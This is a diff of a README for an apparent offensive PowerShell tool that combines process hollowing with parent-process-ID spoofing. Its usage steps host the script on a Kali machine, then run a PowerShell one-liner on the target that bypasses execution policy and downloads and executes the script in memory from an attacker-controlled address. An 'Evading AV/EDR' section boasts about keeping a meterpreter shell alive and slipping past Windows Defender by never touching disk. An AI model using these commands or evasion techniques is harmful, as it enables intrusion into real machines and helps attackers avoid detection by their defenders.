bowtiejicode/Reflective-PPIDxProcHollow/README.md

 3. Host the script on your kali `python3 -m http.server 8088`
 4. On your target machine `powershell -ep Bypass -c IEX(New-Object System.Net.WebClient).DownloadString('http://KALI_IP:8088/Reflective-PPIDxProcHollow_v1.2.ps1')`

+## Disclaimer
+As we are performing parent process ID spoofing, it can be detected via Event Tracing for Windows (EWT).

 ## Evading AV/EDR
 - The v1.0 script creates an alert on Windows Defender upon launching cmd.exe from meterpreter shell.
 However, your meterpreter shell will still be **kept alive** despite the alert.
 - The v1.1 script eradicates the issue of v1.0 and it also makes the process looks more legitimate by spawning it under another parent process through PPID Spoofing.
-However, EWT can still catch PPID Spoofing method.
 - The v1.2 script evades more AV/EDR due to it not touching disk at all 😁

 ## Change Logs